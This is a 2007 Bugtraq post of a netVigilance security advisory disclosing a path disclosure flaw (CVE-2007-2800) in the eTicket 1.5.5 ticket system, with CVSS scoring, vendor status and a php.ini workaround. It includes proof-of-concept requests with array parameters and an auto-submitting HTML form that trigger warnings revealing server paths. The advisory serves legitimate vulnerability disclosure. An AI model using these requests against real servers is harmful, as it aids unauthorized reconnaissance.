'eTicket version 1.5.5 Path Disclosure Vulnerability'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    eTicket version 1.5.5 Path Disclosure Vulnerability
From:       securityresearch () netvigilance ! com
Date:       2007-06-27 21:04:15
Message-ID: 20070627210415.12041.qmail () securityfocus ! com
[Download RAW message or body]

	netVigilance Security Advisory #30
eTicket version 1.5.5 Path Disclosure Vulnerability
Description:
eTicket is an electronic (open source) support ticket system based on osTicket, that \
can receive tickets via email (pop3 or pipe) and a web-based form, as well as manage \
them using a web interface. External References: 
Mitre CVE:  CVE-2007-2800
NVD NIST: CVE-2007-2800
OSVDB: 34785

Summary: 
eTicket is an electronic (open source) support ticket system based on osTicket.
A security problem in the product allows attackers to gather the true path of the \
server-side script. 

Advisory URL: 
http://www.netvigilance.com/advisory0030
Release Date:
06/27/2007

Severity:
Risk: Low
 
CVSS Metrics:
Access Vector: Remote
Access Complexity: Low
Authentication: Not-required
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None 
Impact Bias: Normal
CVSS Base Score: 2.3
 
Target Distribution on Internet: Low
 
Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Confirmed
 
Vulnerability Impact: Attack
Host Impact: Path disclosure

SecureScout Testcase ID:
TC 17960
 
Vulnerable Systems:
eTicket version 1.5.5 (new version 1.5.5.1 is also vulnerable)
Vulnerability Type:
Program flaws - The product scripts have flaws which lead to Warnings.

Vendor:
HM2K

Vendor Status: 
HM 2K from eTicket got the Draft advisory on 21 May 2007 and got extensive support in \
how to fix the security problems on 23 May 2007 and 28 May 2007. In HM 2K's own words \
HM 2K "lost interest" and HM 2K "seriously found it too difficult to orchestrate what \
you [netVigilance] were asking from me [HM 2K], so I just did what I thought was \
best.". netVigilance's tests show that version 1.5.5.1 is also vulnerable. There \
currently is no official fix for this advisory.  
Workaround:
Disable warning messages: modify in the php.ini file following line: display_errors = \
Off.  
Example: 
REQUEST:
http://[TARGET]/[PRODUCT FOLDER]/index.php?name[]=1
OR
http://[TARGET]/[PRODUCT FOLDER]/index.php?email[]=1
OR
http://[TARGET]/[PRODUCT FOLDER]/index.php?phone[]=1
OR
http://[TARGET]/[PRODUCT FOLDER]/index.php?subject[]=1
OR (available for version 1.5.5 and also for new version 1.5.5.1)

Make file (example.html) with the next content:
"
<html>
<body onLoad="document.forms(0).submit();">
<form action="http://[TARGET]/[PRODUCT FOLDER]/index.php" method="POST">
<input type="hidden" name="name[]" value="1">
<input type="hidden" name="email[]" value="1">
<input type="hidden" name="phone[]" value="1">
<input type="hidden" name="subject[]" value="1">
</form>
</body>
</html>
"
Then load it in any web browser.
REPLY:
<b>Warning</b>:  htmlspecialchars() expects parameter 1 to be string, array given in \
<b>[DISCLOSED PATH][PRODUCT FOLDER]\inc\open_form.php</b> on line <b>[18 OR 26 OR 31 \
                OR 51 OR 55]</b><br />
Credits: 
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com
	


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic